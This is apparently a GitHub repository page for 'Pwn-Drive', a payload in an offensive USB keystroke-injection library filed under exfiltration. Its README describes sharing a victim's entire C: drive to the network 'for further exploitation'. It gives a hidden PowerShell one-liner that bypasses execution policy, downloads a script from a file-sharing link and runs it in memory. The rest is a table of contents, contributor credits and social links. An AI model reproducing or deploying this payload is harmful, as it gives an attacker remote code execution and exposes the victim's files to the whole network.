omg-payloads/payloads/library/exfiltration/Pwn-Drive
atomic ccc2e8985e
Add files via upload
2022-10-10 23:09:48 -04:00
..
README.md Add files via upload 2022-10-10 23:09:48 -04:00
c.ps1 Add files via upload 2022-10-10 23:09:48 -04:00
payload.txt Add files via upload 2022-10-10 23:09:48 -04:00

README.md

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Pwn-Drive

A payload to share the victims "C:" drive to the network.

Description

This payload will share the entire victims "C:" drive to the entire network for further exploitation.

Getting Started

Dependencies

  • DropBox or other file sharing service - Your Shared link for the intended file
  • Windows 10

(back to top)

Executing program

  • Plug in your device
  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl

(back to top)

Contributing

All contributors names will be listed here

atomiczsec I am Jakoby

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

📱 My Socials 📱

C#
YouTube
Python
Twitter
Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

Acknowledgments

(back to top)